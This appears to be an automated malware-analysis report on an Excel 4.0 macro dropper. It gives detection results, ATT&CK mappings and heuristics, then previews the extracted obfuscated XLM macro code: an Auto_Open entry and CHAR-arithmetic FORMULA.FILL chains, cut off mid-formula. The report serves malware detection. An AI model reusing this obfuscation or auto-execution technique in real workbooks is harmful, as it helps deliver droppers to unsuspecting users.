MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code upon opening the workbook. Heuristics indicate the use of dangerous formula APIs like RUN, suggesting the macro is designed to download and execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-7790690-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7790690-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126577 bytes |
SHA-256: f5bb920c0340c4b869881a031442b7a920d19e19ccf85de3ace4354e5ce0df60 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!BW14117 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,JM111,"FORMULA.FILL(CHAR(GA46370/EH1672)&CHAR(W33218*IZ31931)&CHAR(GA46370-HN11080)&CHAR(HS34623/IQ11704)&CHAR(JG2129/GC56271)&CHAR(GA46370+FZ36417)&CHAR(JG2129*R1570)&CHAR(CI6472*GX5224)&CHAR(GA46370-DP40723)&CHAR(BN40025*DS15093)&CHAR(CI6472*BS26062)&CHAR(FV26409-JL64697)&CHAR(BN40025/FH37214)&CHAR(W33218-CX17166)&CHAR(W33218/JK4241)&CHAR(FV26409/HI60176)&CHAR(FV26409+HC4786)&CHAR(CI6472*CV26090)&CHAR(BN40025+JH38716)&CHAR(FV26409/IM59397)&CHAR(HS34623/JF32021)&CHAR(BQ20502+HR61947)&CHAR(FV26409*IO18539)&CHAR(CI6472*JR22116)&CHAR(JG2129+HM56917)&CHAR(FV26409/D36733)&CHAR(FV26409-GX31355)&CHAR(CI6472*BO3548)&CHAR(CI6472/JU63408)&CHAR(BN40025-DX57325)&CHAR(JG2129/GM9591)&CHAR(CI6472-HP40415)&CHAR(BQ20502/BE47175)&CHAR(W33218*GG4871)&CHAR(BN40025*HF6396)&CHAR(FV26409*FF37862)&CHAR(HS34623*H5168),FO54580)","" ' Sheet,BZ112,"",-0.06250000000000000000 ' Sheet,JM112,GOTO(GH39750),"" ' Sheet,HD172,"",4.24175824175824178752 ' Sheet,IG193,"",1663.00000000000000000000 ' Sheet,EZ266,"SET.VALUE(Z43421,-456.00000000000000000000/4*GET.CELL(19,GB61783))","" ' Sheet,EZ267,GOTO(Y59128),"" ' Sheet,GS267,"",-295.00000000000000000000 ' Sheet,CG292,"",-1.08163165306122466269 ' Sheet,EP300,"",-284.00000000000000000000 ' Sheet,CP367,"",-2.89908256880733938843 ' Sheet,BF378,"",-0.50925925925925930038 ' Sheet,GQ391,"",-0.79104477611940293702 ' Sheet,GX428,"",-0.04821002386634844900 ' Sheet,GP454,"",-2.06097560975609761513 ' Sheet,CD459,"",-3.65178571428571441260 ' Sheet,CO598,"",3.60975609756097570724 ' Sheet,G610,"",1086.00000000000000000000 ' Sheet,BQ626,"",-0.03357438016528925540 ' Sheet,JR641,"",-101.00000000000000000000 ' Sheet,J654,"",0.02834581899169872493 ' Sheet,JM688,"",2.08928571428571441260 ' Sheet,FY737,"",-3.00000000000000000000 ' Sheet,IG780,"",2160.00000000000000000000 ' Sheet,HG782,"",-0.52682926829268295066 ' Sheet,GW813,"",2419.50000000000000000000 ' Sheet,EU816,"",249.00000000000000000000 ' Sheet,CO854,"",-0.02195704057279236274 ' Sheet,IU864,"",28.00000000000000000000 ' Sheet,BE872,"",-0.63888888888888883955 ' Sheet,FL884,"",-35.19999900000000536693 ' Sheet,EY920,"SET.VALUE(IX32121,-352.00000000000000000000/2*GET.CELL(19,GL31139))","" ' Sheet,EY921,GOTO(GI62685),"" ' Sheet,DX930,"FORMULA.FILL(CHAR(EH31447-EI20285)&CHAR(EH31447*CW17178)&CHAR(BK51427-K39797)&CHAR(FN50710/GJ38558)&CHAR(EH31447+CY8325)&CHAR(HA54251+BE44732)&CHAR(EH31447/IL14163)&CHAR(EH31447*BA36495)&CHAR(BK51427/ID39076)&CHAR(HA54251/IQ22568)&CHAR(EL55098/FH43069)&CHAR(EL55098/IH59732)&CHAR(EN17737-JB23256)&CHAR(IX32121-DA3964)&CHAR(FN50710-EZ49531)&CHAR(Z43421-JP59557)&CHAR(Z43421*DG14684)&CHAR(EH31447/HO38904)&CHAR(HA54251/HJ65066)&CHAR(EH31447-GN1992)&CHAR(IX32121/CP33567)&CHAR(Z43421/JD6236)&CHAR(Z43421*CC29071)&CHAR(IX32121/DF5231)&CHAR(Z43421/BN62736)&CHAR(CP931+HW21240)&CHAR(CP931-GT7810)&CHAR(IU52836/BE33320)&CHAR(CP931-Q40434)&CHAR(HA54251*JA9390)&CHAR(FN50710-DE21197)&CHAR(BK51427*FJ61483)&CHAR(FN50710/GM55549)&CHAR(CP931/EO3541)&CHAR(HA54251*BK48341)&CHAR(FN50710+GG9059)&CHAR(EN17737+GO13915)&CHAR(EL55098+IY48242)&CHAR(EL55098/A39971)&CHAR(Z43421+ER40042)&CHAR(IU52836/CY21950)&CHAR(BK51427-HK23607)&CHAR(FN50710/E61360)&CHAR(EN17737-ER33357)&CHAR(Z43421+Q1579)&CHAR(BK51427+HO5973)&CHAR(EL55098*ES35683)&CHAR(IX32121+JD10324)&CHAR(BK51427-FT9326)&CHAR(IX32121+DF18336)&CHAR(CP931*CI59099)&CHAR(Z43421/HB46361)&CHAR(Z43421*DS30447)&CHAR(EH31447*BZ112)&CHAR(EN17737*GX428)&CHAR(Z43421*GZ53156)&CHAR(IU52836+FC49551)&CHAR(BK51427*Q10915)&CHAR(EL55098+BT28856)&CHAR(EH31447/CD3089)&CHAR(Z43421*GL38657)&CHAR(EN17737/FY4125)&CHAR(BK51427-DC6 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.